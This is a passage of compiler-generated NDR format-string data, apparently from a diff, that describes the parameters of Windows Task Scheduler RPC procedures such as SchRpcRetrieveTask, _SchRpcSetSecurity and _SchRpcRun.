Parameter arg_5 */ + +/* 102 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 104 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 106 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_6 */ + +/* 108 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 110 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 112 */ NdrFcShort( 0xe ), /* Type Offset=14 */ + + /* Parameter arg_7 */ + +/* 114 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 116 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 118 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_8 */ + +/* 120 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 122 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ +/* 124 */ NdrFcShort( 0x42 ), /* Type Offset=66 */ + + /* Parameter arg_9 */ + +/* 126 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 128 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ +/* 130 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure SchRpcRetrieveTask */ + + + /* Return value */ + +/* 132 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 134 */ NdrFcLong( 0x0 ), /* 0 */ +/* 138 */ NdrFcShort( 0x2 ), /* 2 */ +/* 140 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 142 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 144 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 146 */ NdrFcShort( 0x1c ), /* 28 */ +/* 148 */ NdrFcShort( 0x8 ), /* 8 */ +/* 150 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x5, /* 5 */ +/* 152 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 154 */ NdrFcShort( 0x0 ), /* 0 */ +/* 156 */ NdrFcShort( 0x0 ), /* 0 */ +/* 158 */ NdrFcShort( 0x0 ), /* 0 */ +/* 160 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 162 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 164 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 166 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 168 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 170 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 172 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_2 */ + +/* 174 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ +/* 176 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 178 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 180 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 182 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 184 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_4 */ + +/* 186 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 188 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 190 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcCreateFolder */ + + + /* Return value */ + +/* 192 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 194 */ NdrFcLong( 0x0 ), /* 0 */ +/* 198 */ NdrFcShort( 0x3 ), /* 3 */ +/* 200 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 202 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 204 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 206 */ NdrFcShort( 0x8 ), /* 8 */ +/* 208 */ NdrFcShort( 0x8 ), /* 8 */ +/* 210 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 212 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 214 */ NdrFcShort( 0x0 ), /* 0 */ +/* 216 */ NdrFcShort( 0x0 ), /* 0 */ +/* 218 */ NdrFcShort( 0x0 ), /* 0 */ +/* 220 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 222 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 224 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 226 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 228 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 230 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 232 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_2 */ + +/* 234 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 236 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 238 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 240 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 242 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 244 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcSetSecurity */ + + + /* Return value */ + +/* 246 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 248 */ NdrFcLong( 0x0 ), /* 0 */ +/* 252 */ NdrFcShort( 0x4 ), /* 4 */ +/* 254 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 256 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 258 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 260 */ NdrFcShort( 0x8 ), /* 8 */ +/* 262 */ NdrFcShort( 0x8 ), /* 8 */ +/* 264 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 266 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 268 */ NdrFcShort( 0x0 ), /* 0 */ +/* 270 */ NdrFcShort( 0x0 ), /* 0 */ +/* 272 */ NdrFcShort( 0x0 ), /* 0 */ +/* 274 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 276 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 278 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 280 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 282 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 284 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 286 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_2 */ + +/* 288 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 290 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 292 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 294 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 296 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 298 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetSecurity */ + + + /* Return value */ + +/* 300 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 302 */ NdrFcLong( 0x0 ), /* 0 */ +/* 306 */ NdrFcShort( 0x5 ), /* 5 */ +/* 308 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 310 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 312 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 314 */ NdrFcShort( 0x8 ), /* 8 */ +/* 316 */ NdrFcShort( 0x8 ), /* 8 */ +/* 318 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 320 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 322 */ NdrFcShort( 0x0 ), /* 0 */ +/* 324 */ NdrFcShort( 0x0 ), /* 0 */ +/* 326 */ NdrFcShort( 0x0 ), /* 0 */ +/* 328 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 330 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 332 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 334 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 336 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 338 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 340 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 342 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 344 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 346 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_3 */ + +/* 348 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 350 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 352 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcEnumFolders */ + + + /* Return value */ + +/* 354 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 356 */ NdrFcLong( 0x0 ), /* 0 */ +/* 360 */ NdrFcShort( 0x6 ), /* 6 */ +/* 362 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 364 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 366 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 368 */ NdrFcShort( 0x2c ), /* 44 */ +/* 370 */ NdrFcShort( 0x40 ), /* 64 */ +/* 372 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x7, /* 7 */ +/* 374 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 376 */ NdrFcShort( 0x1 ), /* 1 */ +/* 378 */ NdrFcShort( 0x0 ), /* 0 */ +/* 380 */ NdrFcShort( 0x0 ), /* 0 */ +/* 382 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 384 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 386 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 388 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 390 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 392 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 394 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 396 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ +/* 398 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 400 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 402 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 404 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 406 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 408 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 410 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 412 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 414 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 416 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 418 */ NdrFcShort( 0x64 ), /* Type Offset=100 */ + + /* Parameter arg_6 */ + +/* 420 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 422 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 424 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcEnumTasks */ + + + /* Return value */ + +/* 426 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 428 */ NdrFcLong( 0x0 ), /* 0 */ +/* 432 */ NdrFcShort( 0x7 ), /* 7 */ +/* 434 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 436 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 438 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 440 */ NdrFcShort( 0x2c ), /* 44 */ +/* 442 */ NdrFcShort( 0x40 ), /* 64 */ +/* 444 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x7, /* 7 */ +/* 446 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 448 */ NdrFcShort( 0x1 ), /* 1 */ +/* 450 */ NdrFcShort( 0x0 ), /* 0 */ +/* 452 */ NdrFcShort( 0x0 ), /* 0 */ +/* 454 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 456 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 458 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 460 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 462 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 464 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 466 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 468 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ +/* 470 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 472 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 474 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 476 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 478 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 480 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 482 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 484 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 486 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 488 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 490 */ NdrFcShort( 0x64 ), /* Type Offset=100 */ + + /* Parameter arg_6 */ + +/* 492 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 494 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 496 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcEnumInstances */ + + + /* Return value */ + +/* 498 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 500 */ NdrFcLong( 0x0 ), /* 0 */ +/* 504 */ NdrFcShort( 0x8 ), /* 8 */ +/* 506 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 508 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 510 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 512 */ NdrFcShort( 0x8 ), /* 8 */ +/* 514 */ NdrFcShort( 0x24 ), /* 36 */ +/* 516 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x5, /* 5 */ +/* 518 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 520 */ NdrFcShort( 0x1 ), /* 1 */ +/* 522 */ NdrFcShort( 0x0 ), /* 0 */ +/* 524 */ NdrFcShort( 0x0 ), /* 0 */ +/* 526 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 528 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 530 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 532 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_1 */ + +/* 534 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 536 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 538 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 540 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 542 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 544 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 546 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 548 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 550 */ NdrFcShort( 0x82 ), /* Type Offset=130 */ + + /* Parameter arg_4 */ + +/* 552 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 554 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 556 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetInstanceInfo */ + + + /* Return value */ + +/* 558 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 560 */ NdrFcLong( 0x0 ), /* 0 */ +/* 564 */ NdrFcShort( 0x9 ), /* 9 */ +/* 566 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ +/* 568 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 570 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 572 */ NdrFcShort( 0x44 ), /* 68 */ +/* 574 */ NdrFcShort( 0x5c ), /* 92 */ +/* 576 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ + 0x9, /* 9 */ +/* 578 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 580 */ NdrFcShort( 0x1 ), /* 1 */ +/* 582 */ NdrFcShort( 0x0 ), /* 0 */ +/* 584 */ NdrFcShort( 0x0 ), /* 0 */ +/* 586 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 588 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ +/* 590 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 592 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ + + /* Parameter arg_1 */ + +/* 594 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 596 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 598 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_2 */ + +/* 600 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 602 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 604 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 606 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 608 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 610 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_4 */ + +/* 612 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 614 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 616 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_5 */ + +/* 618 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 620 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 622 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_6 */ + +/* 624 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 626 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 628 */ NdrFcShort( 0xb6 ), /* Type Offset=182 */ + + /* Parameter arg_7 */ + +/* 630 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 632 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 634 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_8 */ + +/* 636 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 638 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ +/* 640 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcStopInstance */ + + + /* Return value */ + +/* 642 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 644 */ NdrFcLong( 0x0 ), /* 0 */ +/* 648 */ NdrFcShort( 0xa ), /* 10 */ +/* 650 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 652 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 654 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 656 */ NdrFcShort( 0x4c ), /* 76 */ +/* 658 */ NdrFcShort( 0x8 ), /* 8 */ +/* 660 */ 0x44, /* Oi2 Flags: has return, has ext, */ + 0x3, /* 3 */ +/* 662 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 664 */ NdrFcShort( 0x0 ), /* 0 */ +/* 666 */ NdrFcShort( 0x0 ), /* 0 */ +/* 668 */ NdrFcShort( 0x0 ), /* 0 */ +/* 670 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 672 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ +/* 674 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 676 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ + + /* Parameter arg_1 */ + +/* 678 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 680 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 682 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 684 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 686 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 688 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcStop */ + + + /* Return value */ + +/* 690 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 692 */ NdrFcLong( 0x0 ), /* 0 */ +/* 696 */ NdrFcShort( 0xb ), /* 11 */ +/* 698 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 700 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 702 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 704 */ NdrFcShort( 0x8 ), /* 8 */ +/* 706 */ NdrFcShort( 0x8 ), /* 8 */ +/* 708 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x3, /* 3 */ +/* 710 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 712 */ NdrFcShort( 0x0 ), /* 0 */ +/* 714 */ NdrFcShort( 0x0 ), /* 0 */ +/* 716 */ NdrFcShort( 0x0 ), /* 0 */ +/* 718 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 720 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 722 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 724 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_1 */ + +/* 726 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 728 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 730 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 732 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 734 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 736 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcRun */ + + + /* Return value */ + +/* 738 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 740 */ NdrFcLong( 0x0 ), /* 0 */ +/* 744 */ NdrFcShort( 0xc ), /* 12 */ +/* 746 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ +/* 748 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 750 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 752 */ NdrFcShort( 0x18 ), /* 24 */ +/* 754 */ NdrFcShort( 0x4c ), /* 76 */ +/* 756 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x8, /* 8 */ +/* 758 */ 0xa, /* 10 */ + 0x5, /* Ext Flags: new corr desc, srv corr check, */ +/* 760 */ NdrFcShort( 0x0 ), /* 0 */ +/* 762 */ NdrFcShort( 0x1 ), /* 1 */ +/* 764 */ NdrFcShort( 0x0 ), /* 0 */ +/* 766 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 768 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 770 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 772 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 774 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 776 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 778 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 780 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 782 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 784 */ NdrFcShort( 0xd4 ), /* Type Offset=212 */ + + /* Parameter arg_3 */ + +/* 786 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 788 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 790 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 792 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 794 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 796 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 798 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 800 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 802 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_6 */ + +/* 804 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ +/* 806 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 808 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ + + /* Parameter arg_7 */ + +/* 810 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 812 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 814 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcDelete */ + + + /* Return value */ + +/* 816 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 818 */ NdrFcLong( 0x0 ), /* 0 */ +/* 822 */ NdrFcShort( 0xd ), /* 13 */ +/* 824 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 826 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 828 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 830 */ NdrFcShort( 0x8 ), /* 8 */ +/* 832 */ NdrFcShort( 0x8 ), /* 8 */ +/* 834 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x3, /* 3 */ +/* 836 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 838 */ NdrFcShort( 0x0 ), /* 0 */ +/* 840 */ NdrFcShort( 0x0 ), /* 0 */ +/* 842 */ NdrFcShort( 0x0 ), /* 0 */ +/* 844 */ NdrFcShort( 0x0 